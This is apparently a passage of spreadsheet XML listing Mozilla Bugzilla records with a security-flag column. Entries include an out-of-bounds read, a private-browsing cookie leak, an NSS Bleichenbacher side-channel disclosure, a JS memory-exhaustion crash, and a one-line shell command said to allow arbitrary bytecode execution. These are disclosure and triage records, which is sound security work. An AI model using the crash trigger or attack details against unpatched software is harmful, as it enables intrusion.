&gt;    1. Condition i &lt; len, taking true branch
&gt;    5. Condition i &lt; len, taking true branch
&gt; 192  for (int i = 0; i &lt; len; i++) {
&gt;    2. Condition destIdx &gt; 4UL /* mozilla::ArrayLength(dest) */, taking false branch
&gt;    6. Condition destIdx &gt; 4UL /* mozilla::ArrayLength(dest) */, taking false branch
&gt;    7. cond_at_most: Checking destIdx &gt; 4UL implies that destIdx may be up to 4 on the false branch.
&gt; 193    if (destIdx &gt; ArrayLength(dest)) {
&gt; 194      // Invalid format found. Ensure we don't access dest beyond bounds.
&gt; 195      return false;
&gt; 196    }
&gt; 197
&gt;    3. Condition aSource[i] == '.', taking true branch
&gt;    8. Condition aSource[i] == '.', taking true branch
&gt; 198    if (aSource[i] == '.') {
&gt;    CID 1299530 (#1 of 1): Out-of-bounds read (OVERRUN)9. overrun-local: Overrunning array dest of 4 8-byte elements at element index 4 (byte offset 32) using index destIdx++ (which evaluates to 4).
&gt; 199      dest[destIdx++][destPos] = 0;
&gt; 200      destPos = 0;
&gt;    4. Continuing loop
&gt; 201      continue;
&gt; 202    }
&gt; 203
[1] https://hg.mozilla.org/mozilla-central/annotate/2ddec2dedced/widget/GfxDriverInfo.h#l185
[2] https://hg.mozilla.org/mozilla-central/annotate/2ddec2dedced/widget/GfxDriverInfo.h#l194</t>
        </is>
      </c>
      <c r="X498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="499">
      <c r="A499" t="n">
        <v>1705068</v>
      </c>
      <c r="B499" t="inlineStr">
        <is>
          <t>2021-04-14 05:51:36 -0700</t>
        </is>
      </c>
      <c r="C499" t="inlineStr">
        <is>
          <t>Private Browsing not respected for search suggestions</t>
        </is>
      </c>
      <c r="D499" t="inlineStr">
        <is>
          <t>2022-11-03 23:25:53 -0700</t>
        </is>
      </c>
      <c r="E499" t="n">
        <v>1</v>
      </c>
      <c r="F499" t="n">
        <v>1</v>
      </c>
      <c r="G499" t="n">
        <v>2</v>
      </c>
      <c r="H499" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I499" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J499" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K499" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L499" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M499" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N499" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P499" t="inlineStr">
        <is>
          <t>[adv-main89+]</t>
        </is>
      </c>
      <c r="Q499" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R499" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S499" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T499" t="n">
        <v>1</v>
      </c>
      <c r="U499" t="n">
        <v>0</v>
      </c>
      <c r="V499" t="n">
        <v>10</v>
      </c>
      <c r="W499" t="inlineStr">
        <is>
          <t>The problematic code can be seen here:
https://github.com/mozilla-mobile/android-components/blob/78979a815d9ba671e6cc8009ef50b80a26ab7896/components/feature/awesomebar/src/main/java/mozilla/components/feature/awesomebar/provider/SearchSuggestionProvider.kt#L247-L251
The request retrieving search suggestions does not respect Private Browsing mode. While Fenix doesn’t have search suggestions enabled by default in Private Browsing and warns about the impact (everything typed into address bar sent to search provider), this is still unnecessary. Once a search is accepted, this allows search providers (by default Google) to match the regular search session to the private one.
The issue can be confirmed by debugging the network traffic of the main process: search suggestions always send the cookies from the regular session, regardless of whether the user is currently in a private tab.</t>
        </is>
      </c>
      <c r="X499" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="500">
      <c r="A500" t="n">
        <v>873614</v>
      </c>
      <c r="B500" t="inlineStr">
        <is>
          <t>2013-05-17 12:25:43 -0700</t>
        </is>
      </c>
      <c r="C500" t="inlineStr">
        <is>
          <t>Age check box on student ambassador does not allow form to be submitted</t>
        </is>
      </c>
      <c r="D500" t="inlineStr">
        <is>
          <t>2013-05-17 15:03:23 -0700</t>
        </is>
      </c>
      <c r="E500" t="n">
        <v>1</v>
      </c>
      <c r="F500" t="n">
        <v>1</v>
      </c>
      <c r="G500" t="n">
        <v>5</v>
      </c>
      <c r="H500" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I500" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J500" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K500" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L500" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M500" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N500" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P500" t="inlineStr"/>
      <c r="Q500" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R500" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S500" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T500" t="n">
        <v>1</v>
      </c>
      <c r="U500" t="n">
        <v>0</v>
      </c>
      <c r="V500" t="n">
        <v>9</v>
      </c>
      <c r="W500" t="inlineStr">
        <is>
          <t>Created attachment 751160
Check box checked but Chrome says it is not
Steps to replicate:
1) Open Chrome
2) Visit http://www.mozilla.org/en-US/contribute/universityambassadors/
3) Fill out form with all required boxes
Expected results:
You can submit the form.
Actual results:
It says to check the 18 year old age check box even though it is checked
I am able to replicate this in Chrome 26, but not in Firefox 21. I got a report that it also happens in Firefox Nightly.</t>
        </is>
      </c>
      <c r="X500" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="501">
      <c r="A501" t="n">
        <v>509244</v>
      </c>
      <c r="B501" t="inlineStr">
        <is>
          <t>2009-08-08 13:32:44 -0700</t>
        </is>
      </c>
      <c r="C501" t="inlineStr">
        <is>
          <t>gfx crash on memory-pressure notification</t>
        </is>
      </c>
      <c r="D501" t="inlineStr">
        <is>
          <t>2009-11-01 21:08:07 -0800</t>
        </is>
      </c>
      <c r="E501" t="n">
        <v>1</v>
      </c>
      <c r="F501" t="n">
        <v>1</v>
      </c>
      <c r="G501" t="n">
        <v>3</v>
      </c>
      <c r="H501" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I501" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J501" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K501" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N501" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P501" t="inlineStr">
        <is>
          <t>[nv]</t>
        </is>
      </c>
      <c r="Q501" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R501" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S501" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T501" t="n">
        <v>1</v>
      </c>
      <c r="U501" t="n">
        <v>0</v>
      </c>
      <c r="V501" t="n">
        <v>22</v>
      </c>
      <c r="W501" t="inlineStr">
        <is>
          <t>Created attachment 393386
fix
Went over this with karlt and stuart in irc..
13:22 &lt; vlad&gt; so there's this function and code: http://mxr.mozilla.org/mozilla-
central/source/gfx/src/thebes/nsThebesDeviceContext.cpp#258
13:23 &lt; vlad&gt; it calls NS_RELEASE and then maybe addrefs again
13:23 &lt; vlad&gt; but
13:23 &lt; vlad&gt; http://mxr.mozilla.org/mozilla-central/source/gfx/src/thebes/nsThebesFontMetrics.cpp#59
13:23 &lt; vlad&gt; Destroy() in nsThebesFontMetrics doesn't do anything
13:24 &lt; vlad&gt; and the destructor just deletes a member
13:24 &lt; vlad&gt; so it'll never get removed from that font cache array.. and we'll addref bogus memory, no?
13:25 &lt; vlad&gt; as best I can tell from mxr, nothing ever calls FontMetricsDeleted in our code
13:25 &lt; vlad&gt; (I'm hitting a crash in Compact, when I issue a memory pressure notification)
13:32 &lt; karl&gt; yeah, doesn't look right to me either
13:32 &lt; vlad&gt; I don't even know what that font cache does
13:32 &lt; vlad&gt; I trhink I have it fixed, at least not to crash
13:32 &lt; vlad&gt; I just call the FontMetricsDeleted from the destructor on mDeviceContext
13:33 &lt; karl&gt; i thought it did look right at one time in the past, but maybe i just believed the comments
13:36 &lt; karl&gt; this pattern appears quite a bit:
13:36 &lt; karl&gt; fm-&gt;Destroy();
13:36 &lt; karl&gt; NS_RELEASE(fm);
13:37 &lt; vlad&gt; fm-&gt;Destroy() should set its device context to null from I can tell
13:37 &lt; vlad&gt; and actually releasing it shouldn' call FontMetricsDeleted if the dc is null
13:37 &lt; vlad&gt; in the places where that pattern appears, fm is destroyed/released only if initialization fails
13:40 &lt; karl&gt; are you seeing the crash in AddRef()?
13:43 &lt; vlad&gt; in the release, actually
13:43 &lt; vlad&gt; the addrefs happen too quickly, the memory still looks semi-valid
13:43 &lt; karl&gt; looks like FontMetricsDeleted is meant to be called from FontMetricsDeleted
13:43 &lt; vlad&gt; but the second time around through a memory pressure notifier after that memory got reused
13:43 &lt; karl&gt; i mean
13:44 &lt; karl&gt; looks like FontMetricsDeleted is meant to be called from ~nsThebesFontMetrics</t>
        </is>
      </c>
      <c r="X501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="502">
      <c r="A502" t="n">
        <v>1485864</v>
      </c>
      <c r="B502" t="inlineStr">
        <is>
          <t>2018-08-23 19:05:14 -0700</t>
        </is>
      </c>
      <c r="C502" t="inlineStr">
        <is>
          <t>Vulnerability disclosure Bleichenbacher attack</t>
        </is>
      </c>
      <c r="D502" t="inlineStr">
        <is>
          <t>2019-03-24 12:47:58 -0700</t>
        </is>
      </c>
      <c r="E502" t="n">
        <v>1</v>
      </c>
      <c r="F502" t="n">
        <v>1</v>
      </c>
      <c r="G502" t="n">
        <v>3</v>
      </c>
      <c r="H502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I502" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J502" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K502" t="inlineStr">
        <is>
          <t>3.37</t>
        </is>
      </c>
      <c r="L502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N502" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P502" t="inlineStr">
        <is>
          <t>[adv-main64-][adv-esr60.4-]Embargoed until 30 November 2018 15:00 GMT</t>
        </is>
      </c>
      <c r="Q502" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R502" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S502" t="inlineStr">
        <is>
          <t>3.41</t>
        </is>
      </c>
      <c r="T502" t="n">
        <v>0</v>
      </c>
      <c r="U502" t="n">
        <v>0</v>
      </c>
      <c r="V502" t="n">
        <v>25</v>
      </c>
      <c r="W502" t="inlineStr">
        <is>
          <t>***** IMPORTANT: This information is under 120 days embargo (exact time will be coordinated). This MUST NOT be talked about before that time, except on a need-to-know basis.
Dear NSS team,
Thanks for your quick response.
The vulnerability that we found is to a cache side channel based variant of the Bleichenbacher attack.
We are currently in the process of writing the paper and implementing PoCs for some of the vulnerable TLS implementations.
We decided to rush the disclosure process because this type of attack is now getting a lot of attention due to the recent “Pseudo Constant Time Implementations of TLS Are Only Pseudo Secure” paper by Ronen et al. that was just  published (https://eprint.iacr.org/2018/747). We though it will be prudent to give you a heads up as soon as possible.
We have looked at your rsa decryption code (confirmed in the latest commit 0c3fab7e731af1ced04c63c194cea0660d4a1ae2). Although you have implemented countermeasures against the Bleichenbacher attack in your code, we think it is still vulnerable to cache attacks.
We have looked at the function ssl3_HandleRSAClientKeyExchange at ssl3con.c.
This function have several non constant time operations. For example the random number buffer is only accessed after the RSA decryption if the padding fails. Another example is the conditional call to the function SSL3_SendAlert. We can detect those conditional operations using a cache attack to create a Bleichenbacher padding oracle.
We have implemented similar PoC on other TLS implementations.
We strongly recommend to switch to a full constant time constant memory access solution such as the one in the latest version of OpenSSL.
We will be happy to answer any questions, and to provide you with more details.
Best regards,
Yuval, Eyal, Adi, David and Daniel</t>
        </is>
      </c>
      <c r="X502" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="503">
      <c r="A503" t="n">
        <v>1402592</v>
      </c>
      <c r="B503" t="inlineStr">
        <is>
          <t>2017-09-23 04:47:55 -0700</t>
        </is>
      </c>
      <c r="C503" t="inlineStr">
        <is>
          <t>Crash in shutdownhang | ZwWaitForKeyedEvent | RtlSleepConditionVariableCS | SleepConditionVariableCS | mozilla::detail::ConditionVariableImpl::wait | mozilla::CondVar::Wait | mozilla::ThreadEventQueue&lt;T&gt;::GetEvent</t>
        </is>
      </c>
      <c r="D503" t="inlineStr">
        <is>
          <t>2023-12-18 01:36:49 -0800</t>
        </is>
      </c>
      <c r="E503" t="n">
        <v>1</v>
      </c>
      <c r="F503" t="n">
        <v>1</v>
      </c>
      <c r="G503" t="n">
        <v>3</v>
      </c>
      <c r="H503" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I503" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J503" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K503" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L503" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M503" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N503" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P503" t="inlineStr">
        <is>
          <t>[clouseau][gfx-noted]</t>
        </is>
      </c>
      <c r="Q503" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R503" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S503" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T503" t="n">
        <v>1</v>
      </c>
      <c r="U503" t="n">
        <v>0</v>
      </c>
      <c r="V503" t="n">
        <v>12</v>
      </c>
      <c r="W503" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-294ba17c-b23d-462a-8dc2-23f7f0170923.
=============================================================
There are 29 crashes on nightly 57-58 starting with buildid 20170921100141. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1389021.
[1] https://hg.mozilla.org/mozilla-central/rev/4dd86bbce649</t>
        </is>
      </c>
      <c r="X503" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="504">
      <c r="A504" t="n">
        <v>13844</v>
      </c>
      <c r="B504" t="inlineStr">
        <is>
          <t>1999-09-14 17:10:37 -0700</t>
        </is>
      </c>
      <c r="C504" t="inlineStr">
        <is>
          <t>Reply &amp; Forward of JPN msgs freeze apprunner when charset detctor is used</t>
        </is>
      </c>
      <c r="D504" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:59 -0700</t>
        </is>
      </c>
      <c r="E504" t="n">
        <v>1</v>
      </c>
      <c r="F504" t="n">
        <v>1</v>
      </c>
      <c r="G504" t="n">
        <v>3</v>
      </c>
      <c r="H504" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I504" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J504" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K504" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L504" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M504" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N504" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P504" t="inlineStr"/>
      <c r="Q504" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R504" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S504" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T504" t="n">
        <v>1</v>
      </c>
      <c r="U504" t="n">
        <v>0</v>
      </c>
      <c r="V504" t="n">
        <v>12</v>
      </c>
      <c r="W504" t="inlineStr">
        <is>
          <t>** Observed with 9/14/99 Win32 M11 build **
When you reply to or forward a msg containing Japanese text body,
apprunner draws the subject header and then begins to draw the
text body but then it freezes while trying to do that.
It turns out that this problem happens when the intl.charset.detector
is set to "jams" or "jaclassic".
This problem does not happen when the intl.charset.detector is
set to "japsm".
For obvious reasons, the freeze does not happen on messages which
don't contain Japanese.</t>
        </is>
      </c>
      <c r="X504" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="505">
      <c r="A505" t="n">
        <v>1839007</v>
      </c>
      <c r="B505" t="inlineStr">
        <is>
          <t>2023-06-17 03:19:19 -0700</t>
        </is>
      </c>
      <c r="C505" t="inlineStr">
        <is>
          <t>Access Violation on IsPatternMatching -&gt; JS_GetProperty -&gt; JS_ForwardGetPropertyTo</t>
        </is>
      </c>
      <c r="D505" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:06 -0700</t>
        </is>
      </c>
      <c r="E505" t="n">
        <v>1</v>
      </c>
      <c r="F505" t="n">
        <v>1</v>
      </c>
      <c r="G505" t="n">
        <v>3</v>
      </c>
      <c r="H505" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I505" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J505" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K505" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N505" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P505" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q505" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R505" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S505" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T505" t="n">
        <v>1</v>
      </c>
      <c r="U505" t="n">
        <v>0</v>
      </c>
      <c r="V505" t="n">
        <v>35</v>
      </c>
      <c r="W505" t="inlineStr">
        <is>
          <t>Created attachment 9339698
testcase.html
After allocate memory to exhaust the process virtual memory and execute invalid JS function inside try {} catch() {} and input pattern. On Firefox 32-bit it able to crash on JS_GetProperty on address 0x000083d8, more interestingly on Firefox 64-bit it able to crash on dynamic (changing) address including 0x00050512fab2b080, 0x000514975972b080, 0x000526aa3e72b080, and more..
Currently the testcase.html is fine-tuned to make it very reliably to reproduce on Firefox 114.0.1 (32-bit) on Windows 11, I tested this very reliably crash on JS_GetProperty on both my machine Intel i9-13900k and AMD Ryzen 7 5700G, it still able to crash on Firefox Nightly 116.0a1 (2023-06-16) (32-bit), but reduced success rate and have to adjust fillMemory code to make it very reliably on Nightly. For now I decided to submit this report and adjust that later.
## Tested on:
- Firefox 114.0.1 (32-bit)
- Firefox 114.0.1 (64-bit)
- Firefox Nightly 116.0a1 (2023-06-16) (32-bit)
- Firefox Nightly 116.0a1 (2023-06-16) (64-bit)
## Steps to reproduce:
1. Open Firefox 114.0.1 (32-bit)
2. Visit attached testcase.html
3. Wait ~20 seconds
4. Firefox tab crashed
5. Analyze the minidump using WinDbg
6. Firefox crash on JS_GetProperty -&gt; JS_ForwardGetPropertyTo</t>
        </is>
      </c>
      <c r="X505" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="506">
      <c r="A506" t="n">
        <v>355655</v>
      </c>
      <c r="B506" t="inlineStr">
        <is>
          <t>2006-10-05 23:17:14 -0700</t>
        </is>
      </c>
      <c r="C506" t="inlineStr">
        <is>
          <t>running script can be recompiled (CVE-2006-5463)</t>
        </is>
      </c>
      <c r="D506" t="inlineStr">
        <is>
          <t>2007-06-14 15:27:43 -0700</t>
        </is>
      </c>
      <c r="E506" t="n">
        <v>1</v>
      </c>
      <c r="F506" t="n">
        <v>1</v>
      </c>
      <c r="G506" t="n">
        <v>3</v>
      </c>
      <c r="H506" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I506" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J506" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K506" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N506" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P506" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q506" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R506" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S506" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T506" t="n">
        <v>1</v>
      </c>
      <c r="U506" t="n">
        <v>0</v>
      </c>
      <c r="V506" t="n">
        <v>29</v>
      </c>
      <c r="W506" t="inlineStr">
        <is>
          <t>$ dbg.obj/js -e "t='1';s=Script('s.compile(t);print(t);');s();"
Assertion failure: map-&gt;vector &amp;&amp; i &lt; map-&gt;length, at jsatom.c:919
$ opt.obj/js -e "t='1';s=Script('s.compile(t);print(t);');s();"
=&gt; crash
You can execute arbitary interpreter bytecodes using this bug.</t>
        </is>
      </c>
      <c r="X506" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="507">
      <c r="A507" t="n">
        <v>861530</v>
      </c>
      <c r="B507" t="inlineStr">
        <is>
          <t>2013-04-13 10:37:20 -0700</t>
        </is>
      </c>
      <c r="C507" t="inlineStr">
        <is>
          <t>Assertion: "id got defined somewhere else?" with Xrays and _content</t>
        </is>
      </c>
      <c r="D507" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:04 -0800</t>
        </is>
      </c>
      <c r="E507" t="n">
        <v>1</v>
      </c>
      <c r="F507" t="n">
        <v>1</v>
      </c>
      <c r="G507" t="n">
        <v>3</v>
      </c>
      <c r="H507" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I507" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J507" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K507" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P507" t="inlineStr">
        <is>
          <t>[adv-main23+]</t>
        </is>
      </c>
      <c r="Q507" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S507" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T507" t="n">
        <v>1</v>
      </c>
      <c r="U507" t="n">
        <v>0</v>
      </c>
      <c r="V507" t="n">
        <v>17</v>
      </c>
      <c r="W507" t="inlineStr">
        <is>
          <t>At some point, the test case from 826471 started failing with this assertion (accessing _content on a sandbox).
bholley via mail: "That Xray code ends up passing |wrapper| (an XrayWrapper) as |obj| to nsWindowSH::NewResolve, which would ordinarily expect a Window reflector. When the resolve hook defines properties on |obj|, we end up in the defineProperty hook of the XrayWrapper, which detects that we're actually mid-resolve here, and subsequently goes and defines the property on the holder. So this check is basically making sure that if the resolve hook claims to have succeeded, that the property made it safely through the whole mess and ended up on the holder.
Looking at the s_content_id stuff in nsDOMClassInfo.cpp, that appears to be the exact bug we're catching, since it looks like the resolve code defines the property on |windowObj|, rather than on |obj| like it's supposed to."
I don't know if this is actually a security problem or not, but it sounds sketchy.</t>
        </is>
      </c>
      <c r="X507" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="508">
      <c r="A508" t="n">
        <v>1364584</v>
      </c>
      <c r="B508" t="inlineStr">
        <is>
          <t>2017-05-12 14:37:42 -0700</t>
        </is>
      </c>
      <c r="C508" t="inlineStr">
        <is>
          <t>Tab Tray updates for Photon</t>
        </is>
      </c>
      <c r="D508" t="inlineStr">
        <is>
          <t>2017-09-19 12:23:32 -0700</t>
        </is>
      </c>
      <c r="E508" t="n">
        <v>1</v>
      </c>
      <c r="F508" t="n">
        <v>1</v>
      </c>
      <c r="G508" t="n">
        <v>2</v>
      </c>
      <c r="H508" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I508" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J508" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K508" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L508" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M508" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N508" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P508" t="inlineStr">
        <is>
          <t>[MobileCore][Photon]</t>
        </is>
      </c>
      <c r="Q508" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R508" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S508" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T508" t="n">
        <v>1</v>
      </c>
      <c r="U508" t="n">
        <v>0</v>
      </c>
      <c r="V508" t="n">
        <v>4</v>
      </c>
      <c r="W508" t="inlineStr">
        <is>
          <t>This bug will track changes related to the Tab Tray including 
- Updated icons in the menu bar
- New animations related to opening/closing tabs</t>
        </is>
      </c>
      <c r="X508" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="509">
      <c r="A509" t="n">
        <v>1676834</v>
      </c>
      <c r="B509" t="inlineStr">
        <is>
          <t>2020-11-12 03:47:26 -0800</t>
        </is>
      </c>
      <c r="C509" t="inlineStr">
        <is>
          <t>Add preferences-reviewer group only the first time the rule matches</t>
        </is>
      </c>
      <c r="D509" t="inlineStr">
        <is>
          <t>2020-11-12 14:24:05 -0800</t>
        </is>
      </c>
      <c r="E509" t="n">
        <v>1</v>
      </c>
      <c r="F509" t="n">
        <v>1</v>
      </c>
      <c r="G509" t="n">
        <v>7</v>
      </c>
      <c r="H509" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I509" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J509" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K509" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L509" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M509" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P509" t="inlineStr"/>
      <c r="Q509" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R509" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S509" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T509" t="n">
        <v>1</v>
      </c>
      <c r="U509" t="n">
        <v>0</v>
      </c>
      <c r="V509" t="n">
        <v>2</v>
      </c>
      <c r="W509" t="inlineStr">
        <is>
